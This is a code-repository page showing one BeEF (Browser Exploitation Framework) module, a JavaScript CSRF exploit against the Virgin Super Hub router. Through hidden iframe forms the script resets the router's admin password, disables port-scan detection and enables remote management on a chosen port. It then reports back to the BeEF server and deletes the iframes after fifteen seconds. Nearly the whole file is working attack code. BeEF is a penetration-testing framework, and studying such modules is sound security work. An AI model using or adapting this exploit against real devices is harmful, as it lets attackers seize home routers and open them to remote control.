Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
765c834f78544cfcd4fb9215d9dac36fe005fe21
beef/modules/exploits/router/virgin_superhub_csrf/command.js
Wade Alcorn fe40038441 Updated copyright year to 2013
2012-12-30 12:47:43 +10:00

39 lines
1.3 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var port = '<%= @port %>';
var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
{'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
]);
var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
{'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
]);
var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
{'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
{'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(virgin_superhub_iframe1);
document.body.removeChild(virgin_superhub_iframe2);
document.body.removeChild(virgin_superhub_iframe3);
}
setTimeout("cleanup()", 15000);
});
Reference in New Issue View Git Blame Copy Permalink